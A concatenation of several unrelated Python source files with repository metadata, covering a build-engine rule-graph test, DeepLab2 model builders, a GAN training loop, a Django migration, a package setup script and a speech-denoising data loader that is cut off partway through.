rules = _suba_root_rules + [
b_from_d,
d_from_a_and_suba,
a_from_c,
]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 2
(B, [Select(D)], b_from_d):
No rule was available to compute D with parameter type SubA
(D, [Select(A), Select(SubA)], [Get(A, C)], d_from_a_and_suba):
No rule was available to compute A with parameter type SubA
""").strip(),
str(cm.exception))
assert_equal_with_printing = assert_equal_with_printing
class RuleGraphMakerTest(unittest.TestCase):
# TODO HasProducts?
def test_smallest_full_test(self):
@rule(Exactly(A), [Select(SubA)])
def a_from_suba(suba):
pass
rules = _suba_root_rules + [
RootRule(SubA),
a_from_suba,
]
fullgraph = self.create_full_graph(rules)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
// internal entries
"(A, [Select(SubA)], a_from_suba) for SubA" -> {"Param(SubA)"}
}""").strip(), fullgraph)
def test_full_graph_for_planner_example(self):
symbol_table = TargetTable()
address_mapper = AddressMapper(JsonParser(symbol_table), '*.BUILD.json')
rules = create_graph_rules(address_mapper) + create_fs_rules()
fullgraph_str = self.create_full_graph(rules)
print('---diagnostic------')
print(fullgraph_str)
print('/---diagnostic------')
in_root_rules = False
in_all_rules = False
all_rules = []
root_rule_lines = []
for line in fullgraph_str.splitlines():
if line.startswith(' // root subject types:'):
pass
elif line.startswith(' // root entries'):
in_root_rules = True
elif line.startswith(' // internal entries'):
in_all_rules = True
elif in_all_rules:
all_rules.append(line)
elif in_root_rules:
root_rule_lines.append(line)
else:
pass
self.assertTrue(6 < len(all_rules))
self.assertTrue(12 < len(root_rule_lines)) # 2 lines per entry
def test_smallest_full_test_multiple_root_subject_types(self):
@rule(A, [Select(SubA)])
def a_from_suba(suba):
pass
@rule(B, [Select(A)])
def b_from_a(a):
pass
rules = [
RootRule(SubA),
RootRule(A),
a_from_suba,
b_from_a,
]
fullgraph = self.create_full_graph(rules)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: A, SubA
// root entries
"Select(A) for A" [color=blue]
"Select(A) for A" -> {"Param(A)"}
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
"Select(B) for A" [color=blue]
"Select(B) for A" -> {"(B, [Select(A)], b_from_a) for A"}
"Select(B) for SubA" [color=blue]
"Select(B) for SubA" -> {"(B, [Select(A)], b_from_a) for SubA"}
// internal entries
"(A, [Select(SubA)], a_from_suba) for SubA" -> {"Param(SubA)"}
"(B, [Select(A)], b_from_a) for A" -> {"Param(A)"}
"(B, [Select(A)], b_from_a) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
}""").strip(),
fullgraph)
def test_single_rule_depending_on_subject_selection(self):
@rule(Exactly(A), [Select(SubA)])
def a_from_suba(suba):
pass
rules = [
a_from_suba,
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
// internal entries
"(A, [Select(SubA)], a_from_suba) for SubA" -> {"Param(SubA)"}
}""").strip(),
subgraph)
def test_multiple_selects(self):
@rule(Exactly(A), [Select(SubA), Select(B)])
def a_from_suba_and_b(suba, b):
pass
@rule(B, [])
def b():
pass
rules = [
a_from_suba_and_b,
b,
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, [Select(SubA), Select(B)], a_from_suba_and_b) for SubA"}
// internal entries
"(A, [Select(SubA), Select(B)], a_from_suba_and_b) for SubA" -> {"(B, [], b) for ()" "Param(SubA)"}
"(B, [], b) for ()" -> {}
}""").strip(),
subgraph)
def test_one_level_of_recursion(self):
@rule(Exactly(A), [Select(B)])
def a_from_b(b):
pass
@rule(B, [Select(SubA)])
def b_from_suba(suba):
pass
rules = [
a_from_b,
b_from_suba,
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, [Select(B)], a_from_b) for SubA"}
// internal entries
"(A, [Select(B)], a_from_b) for SubA" -> {"(B, [Select(SubA)], b_from_suba) for SubA"}
"(B, [Select(SubA)], b_from_suba) for SubA" -> {"Param(SubA)"}
}""").strip(),
subgraph)
def test_noop_removal_in_subgraph(self):
@rule(Exactly(A), [Select(C)])
def a_from_c(c):
pass
@rule(Exactly(A), [])
def a():
pass
rules = [
a_from_c,
a,
SingletonRule(B, B()),
]
subgraph = self.create_subgraph(A, rules, SubA(), validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for ()" [color=blue]
"Select(A) for ()" -> {"(A, [], a) for ()"}
// internal entries
"(A, [], a) for ()" -> {}
}""").strip(),
subgraph)
def test_noop_removal_full_single_subject_type(self):
@rule(Exactly(A), [Select(C)])
def a_from_c(c):
pass
@rule(Exactly(A), [])
def a():
pass
rules = _suba_root_rules + [
a_from_c,
a,
]
fullgraph = self.create_full_graph(rules, validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for ()" [color=blue]
"Select(A) for ()" -> {"(A, [], a) for ()"}
// internal entries
"(A, [], a) for ()" -> {}
}""").strip(),
fullgraph)
def test_root_tuple_removed_when_no_matches(self):
@rule(A, [Select(C)])
def a_from_c(c):
pass
@rule(B, [Select(D), Select(A)])
def b_from_d_and_a(d, a):
pass
rules = [
RootRule(C),
RootRule(D),
a_from_c,
b_from_d_and_a,
]
fullgraph = self.create_full_graph(rules, validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: C, D
// root entries
"Select(A) for C" [color=blue]
"Select(A) for C" -> {"(A, [Select(C)], a_from_c) for C"}
"Select(B) for (C+D)" [color=blue]
"Select(B) for (C+D)" -> {"(B, [Select(D), Select(A)], b_from_d_and_a) for (C+D)"}
// internal entries
"(A, [Select(C)], a_from_c) for C" -> {"Param(C)"}
"(B, [Select(D), Select(A)], b_from_d_and_a) for (C+D)" -> {"(A, [Select(C)], a_from_c) for C" "Param(D)"}
}""").strip(),
fullgraph)
def test_noop_removal_transitive(self):
# If a noop-able rule has rules that depend on it,
# they should be removed from the graph.
@rule(Exactly(B), [Select(C)])
def b_from_c(c):
pass
@rule(Exactly(A), [Select(B)])
def a_from_b(b):
pass
@rule(Exactly(A), [])
def a():
pass
rules = [
b_from_c,
a_from_b,
a,
]
subgraph = self.create_subgraph(A, rules, SubA(), validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for ()" [color=blue]
"Select(A) for ()" -> {"(A, [], a) for ()"}
// internal entries
"(A, [], a) for ()" -> {}
}""").strip(),
subgraph)
def test_get_with_matching_singleton(self):
@rule(Exactly(A), [Select(SubA)])
def a_from_suba(suba):
_ = yield Get(B, C, C()) # noqa: F841
rules = [
a_from_suba,
SingletonRule(B, B()),
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, [Select(SubA)], [Get(B, C)], a_from_suba) for SubA"}
// internal entries
"(A, [Select(SubA)], [Get(B, C)], a_from_suba) for SubA" -> {"Param(SubA)" "Singleton(B(), B)"}
}""").strip(),
subgraph)
def test_depends_on_multiple_one_noop(self):
@rule(B, [Select(A)])
def b_from_a(a):
pass
@rule(A, [Select(C)])
def a_from_c(c):
pass
@rule(A, [Select(SubA)])
def a_from_suba(suba):
pass
rules = [
b_from_a,
a_from_c,
a_from_suba,
]
subgraph = self.create_subgraph(B, rules, SubA(), validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(B) for SubA" [color=blue]
"Select(B) for SubA" -> {"(B, [Select(A)], b_from_a) for SubA"}
// internal entries
"(A, [Select(SubA)], a_from_suba) for SubA" -> {"Param(SubA)"}
"(B, [Select(A)], b_from_a) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
}""").strip(),
subgraph)
def test_multiple_depend_on_same_rule(self):
@rule(B, [Select(A)])
def b_from_a(a):
pass
@rule(C, [Select(A)])
def c_from_a(a):
pass
@rule(A, [Select(SubA)])
def a_from_suba(suba):
pass
rules = _suba_root_rules + [
b_from_a,
c_from_a,
a_from_suba,
]
subgraph = self.create_full_graph(rules)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
"Select(B) for SubA" [color=blue]
"Select(B) for SubA" -> {"(B, [Select(A)], b_from_a) for SubA"}
"Select(C) for SubA" [color=blue]
"Select(C) for SubA" -> {"(C, [Select(A)], c_from_a) for SubA"}
// internal entries
"(A, [Select(SubA)], a_from_suba) for SubA" -> {"Param(SubA)"}
"(B, [Select(A)], b_from_a) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
"(C, [Select(A)], c_from_a) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
}""").strip(),
subgraph)
def test_get_simple(self):
@rule(Exactly(A), [])
def a():
_ = yield Get(B, D, D()) # noqa: F841
@rule(B, [Select(D)])
def b_from_d(d):
pass
rules = [
a,
b_from_d,
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for ()" [color=blue]
"Select(A) for ()" -> {"(A, [], [Get(B, D)], a) for ()"}
// internal entries
"(A, [], [Get(B, D)], a) for ()" -> {"(B, [Select(D)], b_from_d) for D"}
"(B, [Select(D)], b_from_d) for D" -> {"Param(D)"}
}""").strip(),
subgraph)
def test_validate_yield_statements(self):
with self.assertRaisesRegexp(_RuleVisitor.YieldVisitError, re.escape('yield A()')):
@rule(A, [])
def f():
yield A()
# The yield statement isn't at the end of this series of statements.
return
with self.assertRaises(_RuleVisitor.YieldVisitError) as cm:
@rule(A, [])
def h():
yield A(
1 + 2
)
return
# Test that the full indentation of multiple-line yields are represented in the output.
self.assertIn("""\
yield A(
1 + 2
)
""", str(cm.exception))
with self.assertRaises(_RuleVisitor.YieldVisitError) as cm:
@rule(A, [])
def g():
# This is a yield statement without an assignment, and not at the end.
yield Get(B, D, D())
yield A()
exc_msg = str(cm.exception)
exc_msg_trimmed = re.sub(r'^.*?(test_rules\.py)', r'\1', exc_msg, flags=re.MULTILINE)
self.assertEquals(exc_msg_trimmed, """\
In function g: yield in @rule without assignment must come at the end of a series of statements.
A yield in an @rule without an assignment is equivalent to a return, and we
currently require that no statements follow such a yield at the same level of nesting.
Use `_ = yield Get(...)` if you wish to yield control to the engine and discard the result.
The invalid statement was:
test_rules.py:{lineno}:{col}
yield Get(B, D, D())
The rule defined by function `g` begins at:
test_rules.py:{rule_lineno}:{rule_col}
with self.assertRaises(_RuleVisitor.YieldVisitError) as cm:
@rule(A, [])
def g():
""".format(lineno=(sys._getframe().f_lineno - 20),
col=8,
rule_lineno=(sys._getframe().f_lineno - 25),
rule_col=6))
def create_full_graph(self, rules, validate=True):
scheduler = create_scheduler(rules, validate=validate)
return "\n".join(scheduler.rule_graph_visualization())
def create_subgraph(self, requested_product, rules, subject, validate=True):
scheduler = create_scheduler(rules + _suba_root_rules, validate=validate)
return "\n".join(scheduler.rule_subgraph_visualization(type(subject), requested_product))
assert_equal_with_printing = assert_equal_with_printing
| 31.67663 | 131 | 0.528009 |
b8e66f6142ce1de30236a731a290cab9c8e87a69 | 7,102 | py | Python | model/builder.py | hjonnala/deeplab2 | 1868757c4333ec5287cc0bf0a6bbf38fbbe34c2e | [
"Apache-2.0"
] | null | null | null | model/builder.py | hjonnala/deeplab2 | 1868757c4333ec5287cc0bf0a6bbf38fbbe34c2e | [
"Apache-2.0"
] | null | null | null | model/builder.py | hjonnala/deeplab2 | 1868757c4333ec5287cc0bf0a6bbf38fbbe34c2e | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2021 The Deeplab2 Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file contains functions to build encoder and decoder."""
import tensorflow as tf
from deeplab2 import config_pb2
from deeplab2.model.decoder import deeplabv3
from deeplab2.model.decoder import deeplabv3plus
from deeplab2.model.decoder import max_deeplab
from deeplab2.model.decoder import motion_deeplab_decoder
from deeplab2.model.decoder import panoptic_deeplab
from deeplab2.model.decoder import vip_deeplab_decoder
from deeplab2.model.encoder import axial_resnet_instances
from deeplab2.model.encoder import mobilenet
def create_encoder(backbone_options: config_pb2.ModelOptions.BackboneOptions,
bn_layer: tf.keras.layers.Layer,
conv_kernel_weight_decay: float = 0.0) -> tf.keras.Model:
"""Creates an encoder.
Args:
backbone_options: A proto config of type
config_pb2.ModelOptions.BackboneOptions.
bn_layer: A tf.keras.layers.Layer that computes the normalization.
conv_kernel_weight_decay: A float, the weight decay for convolution kernels.
Returns:
An instance of tf.keras.Model containing the encoder.
Raises:
ValueError: An error occurs when the specified encoder meta architecture is
not supported.
"""
if ('resnet' in backbone_options.name or
'swidernet' in backbone_options.name or
'axial_deeplab' in backbone_options.name or
'max_deeplab' in backbone_options.name):
return create_resnet_encoder(
backbone_options,
bn_layer=bn_layer,
conv_kernel_weight_decay=conv_kernel_weight_decay)
elif 'mobilenet' in backbone_options.name:
return create_mobilenet_encoder(
backbone_options,
bn_layer=bn_layer,
conv_kernel_weight_decay=conv_kernel_weight_decay)
raise ValueError('The specified encoder %s is not a valid encoder.' %
backbone_options.name)
def create_mobilenet_encoder(
backbone_options: config_pb2.ModelOptions.BackboneOptions,
bn_layer: tf.keras.layers.Layer,
conv_kernel_weight_decay: float = 0.0) -> tf.keras.Model:
"""Creates a MobileNet encoder specified by name.
Args:
backbone_options: A proto config of type
config_pb2.ModelOptions.BackboneOptions.
bn_layer: A tf.keras.layers.Layer that computes the normalization.
conv_kernel_weight_decay: A float, the weight decay for convolution kernels.
Returns:
An instance of tf.keras.Model containing the MobileNet encoder.
"""
if backbone_options.name.lower() == 'mobilenet_v3_large':
backbone = mobilenet.MobileNetV3Large
elif backbone_options.name.lower() == 'mobilenet_v3_small':
backbone = mobilenet.MobileNetV3Small
elif backbone_options.name.lower() == 'mobilenet_v3_small_edgetpu':
backbone = mobilenet.MobileNetV3SmallEdgeTPU
else:
raise ValueError('The specified encoder %s is not a valid encoder.' %
backbone_options.name)
assert backbone_options.use_squeeze_and_excite
assert backbone_options.drop_path_keep_prob == 1
assert backbone_options.use_sac_beyond_stride == -1
assert backbone_options.backbone_layer_multiplier == 1
return backbone(
output_stride=backbone_options.output_stride,
width_multiplier=backbone_options.backbone_width_multiplier,
bn_layer=bn_layer,
conv_kernel_weight_decay=conv_kernel_weight_decay)
def create_resnet_encoder(
backbone_options: config_pb2.ModelOptions.BackboneOptions,
bn_layer: tf.keras.layers.Layer,
conv_kernel_weight_decay: float = 0.0) -> tf.keras.Model:
"""Creates a ResNet encoder specified by name.
Args:
backbone_options: A proto config of type
config_pb2.ModelOptions.BackboneOptions.
bn_layer: A tf.keras.layers.Layer that computes the normalization.
conv_kernel_weight_decay: A float, the weight decay for convolution kernels.
Returns:
An instance of tf.keras.Model containing the ResNet encoder.
"""
return axial_resnet_instances.get_model(
backbone_options.name,
output_stride=backbone_options.output_stride,
stem_width_multiplier=backbone_options.stem_width_multiplier,
width_multiplier=backbone_options.backbone_width_multiplier,
backbone_layer_multiplier=backbone_options.backbone_layer_multiplier,
block_group_config={
'use_squeeze_and_excite': backbone_options.use_squeeze_and_excite,
'drop_path_keep_prob': backbone_options.drop_path_keep_prob,
'drop_path_schedule': backbone_options.drop_path_schedule,
'use_sac_beyond_stride': backbone_options.use_sac_beyond_stride},
bn_layer=bn_layer,
conv_kernel_weight_decay=conv_kernel_weight_decay)
def create_decoder(model_options: config_pb2.ModelOptions,
bn_layer: tf.keras.layers.Layer,
ignore_label: int) -> tf.keras.Model:
"""Creates a DeepLab decoder.
Args:
model_options: A proto config of type config_pb2.ModelOptions.
bn_layer: A tf.keras.layers.Layer that computes the normalization.
ignore_label: An integer specifying the ignore label.
Returns:
An instance of tf.keras.layers.Layer containing the decoder.
Raises:
ValueError: An error occurs when the specified meta architecture is not
supported.
"""
meta_architecture = model_options.WhichOneof('meta_architecture')
if meta_architecture == 'deeplab_v3':
return deeplabv3.DeepLabV3(
model_options.decoder, model_options.deeplab_v3, bn_layer=bn_layer)
elif meta_architecture == 'deeplab_v3_plus':
return deeplabv3plus.DeepLabV3Plus(
model_options.decoder, model_options.deeplab_v3_plus, bn_layer=bn_layer)
elif meta_architecture == 'panoptic_deeplab':
return panoptic_deeplab.PanopticDeepLab(
model_options.decoder,
model_options.panoptic_deeplab,
bn_layer=bn_layer)
elif meta_architecture == 'motion_deeplab':
return motion_deeplab_decoder.MotionDeepLabDecoder(
model_options.decoder,
model_options.motion_deeplab,
bn_layer=bn_layer)
elif meta_architecture == 'vip_deeplab':
return vip_deeplab_decoder.ViPDeepLabDecoder(
model_options.decoder,
model_options.vip_deeplab,
bn_layer=bn_layer)
elif meta_architecture == 'max_deeplab':
return max_deeplab.MaXDeepLab(
model_options.decoder,
model_options.max_deeplab,
ignore_label=ignore_label,
bn_layer=bn_layer)
raise ValueError('The specified meta architecture %s is not implemented.' %
meta_architecture)
| 40.124294 | 80 | 0.754999 |
2e26529cddd4fc9eea0ccd073ff698ddbb7c9e7f | 5,698 | py | Python | trainer/rascv2_trainer.py | zhou3968322/dl-lab | f6f028df2bd3f68146b3285800938afe71eba442 | [
"MIT"
] | null | null | null | trainer/rascv2_trainer.py | zhou3968322/dl-lab | f6f028df2bd3f68146b3285800938afe71eba442 | [
"MIT"
] | null | null | null | trainer/rascv2_trainer.py | zhou3968322/dl-lab | f6f028df2bd3f68146b3285800938afe71eba442 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
# email:bingchengzhou@foxmail.com
# create: 2021/1/12
from utils.common_util import get_model_name
import models, datasets
from utils.log import logger
import time, torchvision
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
class DbwrTrainer(object):
def __init__(self, config):
self.experiment_name = config.pop('name')
self.random_seed = config.get('random_seed', 30)
self.start_epoch = config["trainer"]["scheduler"]["start_epoch"]
self.niter = config["trainer"]["scheduler"]["niter"]
self.niter_decay = config["trainer"]["scheduler"]["niter_decay"]
model_name = get_model_name(config["arch"].pop("type"))
self.model = getattr(models, model_name)(config)
logger.info("model init success")
tensorboard_log_dir = config["trainer"]["log_dir"]
self.writer = SummaryWriter(log_dir=tensorboard_log_dir, comment=self.experiment_name)
self.display_freq = config["trainer"]["display_freq"]
# self.evaluate_freq = config["trainer"]["evaluate_freq"]
self.print_freq = config["trainer"]["print_freq"]
self.evaluate_freq = config["trainer"]["evaluate_freq"]
self.save_epoch_freq = config["trainer"].get("save_epoch_freq", 0)
self.save_step_freq = config["trainer"].get("save_step_freq", 0)
dataset_args = config["datasets"]["train"]["dataset"]
dataset_type = dataset_args["type"]
dataset_init_args = dataset_args["args"]
dataset = getattr(datasets, dataset_type)(**dataset_init_args)
data_loader_args = config["datasets"]["train"]["loader"]
train_loader = DataLoader(dataset=dataset, **data_loader_args)
self.train_loader = train_loader
self.model.set_mode()
self.global_step = 0
def train(self):
for epoch in range(self.start_epoch, self.niter + self.niter_decay + 1):
self.train_one_epoch(epoch)
self.writer.close()
def train_one_epoch(self, epoch):
epoch_start_time = time.time()
for train_data in self.train_loader:
iter_start_time = time.time()
self.model.train(train_data)
self.global_step += 1
if self.global_step % self.print_freq == 0:
errors = self.model.get_current_errors()
t_comp = time.time() - iter_start_time
message = 'experiment:%s, (epoch: %d, steps: %d, time: %.3f) ' % (self.experiment_name, epoch,
self.global_step, t_comp)
for key, value in errors.items():
message += '%s: %.5f ' % (key, value)
self.writer.add_scalar(key, errors[key], self.global_step)
logger.info(message)
# if self.global_step % self.evaluate_freq == 0:
# evaluate_errors = self.model.get_evaluate_errors()
# t_comp = time.time() - iter_start_time
# message = 'experiment:%s, (epoch: %d, steps: %d, time: %.3f) ' % (self.experiment_name, epoch,
# self.global_step, t_comp)
# for key, value in evaluate_errors.items():
# message += '%s: %.5f ' % (key, value)
# self.writer.add_scalar(key, evaluate_errors[key], self.global_step)
# logger.info(message)
if self.global_step % self.display_freq == 0:
visual_input = self.model.get_current_visuals()
grid = torchvision.utils.make_grid(list(visual_input), nrow=3)
img_name = self.model.img_name
self.writer.add_image('experiment_{}_train_epoch_{}_step_{}_img_name_{}'.
format(self.experiment_name, epoch, self.global_step, img_name), grid,
self.global_step)
if self.global_step % self.evaluate_freq == 0:
self.model.set_mode(mode="eval")
fake_b = self.model.inference(train_data["A"])
b, c, h, w = fake_b.size()
input_image = (train_data["A"].data.cpu()[0, :, :, :] + 1) / 2.0
fake_b = ((fake_b.data.cpu()[0, :, :, :] + 1) / 2.0).expand(3, h, w)
real_b = ((train_data["B"].data.cpu()[0, :, :, :] + 1) / 2.0).expand(3, h, w)
visuals = [input_image, fake_b, real_b]
grid = torchvision.utils.make_grid(visuals, nrow=3)
img_name = self.model.img_name
self.writer.add_image('experiment_{}_eval_epoch_{}_step_{}_img_name_{}'.
format(self.experiment_name, epoch, self.global_step, img_name), grid,
self.global_step + 1)
self.model.set_mode()
if self.save_epoch_freq == 0 and self.save_step_freq > 0 and self.global_step % self.save_step_freq == 0:
logger.info('saving the model epoch:{}, step:{}'.format(epoch, self.global_step))
self.model.save_networks(epoch)
if self.save_epoch_freq > 0 and epoch % self.save_epoch_freq == 0:
logger.info('saving the model at the end of epoch:{}'.format(epoch))
self.model.save_networks(epoch)
logger.info('End of epoch {} / {} \t Time Taken: {} sec'.format(epoch, self.niter + self.niter_decay,
time.time() - epoch_start_time))
self.model.update_learning_rate()
| 52.759259 | 117 | 0.571955 |
13fc9c9cacee8e96a311b3cfcfbfef0a9f8c9e6f | 550 | py | Python | backend_rest/tracking/migrations/0010_auto_20200622_2123.py | ezrankayamba/twiga_distribution | ac4fd3d4f6b111e734a932398be564c863582be2 | [
"MIT"
] | null | null | null | backend_rest/tracking/migrations/0010_auto_20200622_2123.py | ezrankayamba/twiga_distribution | ac4fd3d4f6b111e734a932398be564c863582be2 | [
"MIT"
] | 16 | 2020-03-23T13:24:11.000Z | 2022-03-12T00:17:58.000Z | backend_rest/tracking/migrations/0010_auto_20200622_2123.py | ezrankayamba/twiga_distribution | ac4fd3d4f6b111e734a932398be564c863582be2 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.2 on 2020-06-22 18:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('setups', '0005_auto_20200616_1848'),
('tracking', '0009_auto_20200620_1812'),
]
operations = [
migrations.AlterField(
model_name='customer',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='customers', to='setups.Category'),
),
]
| 26.190476 | 129 | 0.649091 |
012fbb7751e89639e178965b4386786f1214e430 | 2,563 | py | Python | setup.py | pytorch-duo/torchmm | 0e44f8599d26a29c345e7cc85e2885813346dc0b | [
"MIT"
] | null | null | null | setup.py | pytorch-duo/torchmm | 0e44f8599d26a29c345e7cc85e2885813346dc0b | [
"MIT"
] | 3 | 2021-06-08T22:22:40.000Z | 2022-03-12T00:47:40.000Z | setup.py | macabdul9/torchmm | 0e44f8599d26a29c345e7cc85e2885813346dc0b | [
"MIT"
] | null | null | null | import codecs
import os
from setuptools import find_packages, setup
# Basic information
NAME = "torchmm"
DESCRIPTION = "PyTorch DataLoader and Abstraction for multi-modal data."
VERSION = "0.0.2 alpha"
AUTHOR = "Abdul Waheed, Ganeshan Malhotra"
EMAIL = "abdulwaheed1513@gmail.com"
LICENSE = "MIT"
REPOSITORY = "https://github.com/pytorch-duo/torchmm"
PACKAGE = "torchmm"
with open("README.md", "r") as f:
LONG_DESCRIPTION = f.read()
# Define the keywords
KEYWORDS = ["machine learning","deep learning", "computer vision", "natural language processing", "pytorch"]
# Define the classifiers
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
CLASSIFIERS = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
]
# Important Paths
PROJECT = os.path.abspath(os.path.dirname(__file__))
REQUIRE_PATH = "requirements.txt"
VERSION_PATH = os.path.join(PACKAGE, "version.py")
PKG_DESCRIBE = "README.md"
# Directories to ignore in find_packages
EXCLUDES = ()
# helper functions
def read(*parts):
"""
returns contents of file
"""
with codecs.open(os.path.join(PROJECT, *parts), "rb", "utf-8") as file:
return file.read()
def get_requires(path=REQUIRE_PATH):
"""
generates requirements from file path given as REQUIRE_PATH
"""
for line in read(path).splitlines():
line = line.strip()
if line and not line.startswith("#"):
yield line
# Define the configuration
CONFIG = {
"name": NAME,
"version": VERSION,
"description": DESCRIPTION,
"long_description": LONG_DESCRIPTION,
"long_description_content_type": "text/markdown",
"classifiers": CLASSIFIERS,
"keywords": KEYWORDS,
"license": LICENSE,
"author": AUTHOR,
"author_email": EMAIL,
"url": REPOSITORY,
"project_urls": {"Source": REPOSITORY},
"packages": find_packages(where=PROJECT, exclude=EXCLUDES),
"install_requires": list(get_requires()),
"python_requires": ">=3.5",
}
if __name__ == "__main__":
setup(**CONFIG)
| 28.797753 | 108 | 0.678892 |
a4849490214a648184f952591eac6d31b8226e68 | 7,954 | py | Python | scripts/data_loader.py | snehitvaddi/pseudo-visual-speech-denoising | 9247319ef967fa5c40902aeb7c04a117b1387f3a | [
"MIT"
] | 84 | 2020-12-22T10:50:06.000Z | 2022-03-22T06:17:06.000Z | scripts/data_loader.py | snehitvaddi/pseudo-visual-speech-denoising | 9247319ef967fa5c40902aeb7c04a117b1387f3a | [
"MIT"
] | 6 | 2020-12-23T03:49:47.000Z | 2022-03-30T11:41:26.000Z | scripts/data_loader.py | snehitvaddi/pseudo-visual-speech-denoising | 9247319ef967fa5c40902aeb7c04a117b1387f3a | [
"MIT"
] | 17 | 2020-12-23T15:52:01.000Z | 2022-02-07T11:58:02.000Z | from torch.utils.data import Dataset, DataLoader
import torch
import numpy as np
import audio.audio_utils as audio
import audio.hparams as hparams
import random
import os
import librosa
class DataGenerator(Dataset):
def __init__(self, pretrain_path, train_path, noise_path, sampling_rate, split):
self.files = hparams.get_all_files(pretrain_path, train_path, split)
self.random_files = hparams.get_noise_list(noise_path)
self.sampling_rate = sampling_rate
def __len__(self):
return len(self.files)
def __getitem__(self, index):
while(1):
index = random.randint(0, len(self.files) - 1)
fname = self.files[index]
mel, stft, y = self.process_audio(fname)
if mel is None or stft is None or y is None:
continue
inp_mel = torch.FloatTensor(np.array(mel)).unsqueeze(1)
inp_stft = torch.FloatTensor(np.array(stft))
gt_stft = torch.FloatTensor(np.array(y))
return inp_mel, inp_stft, gt_stft
def process_audio(self, file):
# Load the gt wav file
try:
gt_wav = audio.load_wav(file, self.sampling_rate) # m
except:
return None, None, None
# Get the random file from VGGSound to mix with the ground truth file
random_file = random.choice(self.random_files)
# Load the random wav file
try:
random_wav = audio.load_wav(random_file, self.sampling_rate) # n
except:
return None, None, None
# Mix the noisy wav file with the clean GT file
try:
idx = random.randint(0, len(random_wav) - len(gt_wav) - 1)
random_wav = random_wav[idx:idx + len(gt_wav)]
snrs = [0, 5, 10]
target_snr = random.choice(snrs)
noisy_wav = self.add_noise(gt_wav, random_wav, target_snr)
except:
return None, None, None
# Extract the corresponding audio segments of 1 second
start_idx, gt_seg_wav, noisy_seg_wav = self.crop_audio_window(gt_wav, noisy_wav, random_wav)
if start_idx is None or gt_seg_wav is None or noisy_seg_wav is None:
return None, None, None
# -----------------------------------STFTs--------------------------------------------- #
# Get the STFT, normalize and concatenate the mag and phase of GT and noisy wavs
gt_spec = self.get_spec(gt_seg_wav) # Tx514
noisy_spec = self.get_spec(noisy_seg_wav) # Tx514
# ------------------------------------------------------------------------------------- #
# -----------------------------------Melspecs------------------------------------------ #
noisy_mels = self.get_segmented_mels(start_idx, noisy_wav) # Tx80x16
if noisy_mels is None:
return None, None, None
# ------------------------------------------------------------------------------------- #
# Input to the lipsync student model: Noisy melspectrogram
inp_mel = np.array(noisy_mels) # Tx80x16
# Input to the denoising model: Noisy linear spectrogram
inp_stft = np.array(noisy_spec) # Tx514
# GT to the denoising model: Clean linear spectrogram
gt_stft = np.array(gt_spec) # Tx514
return inp_mel, inp_stft, gt_stft
def crop_audio_window(self, gt_wav, noisy_wav, random_wav):
if gt_wav.shape[0] - hparams.hparams.wav_step_size <= 1280:
return None, None, None
# Get 1 second random segment from the wav
start_idx = np.random.randint(low=1280, high=gt_wav.shape[0] - hparams.hparams.wav_step_size)
end_idx = start_idx + hparams.hparams.wav_step_size
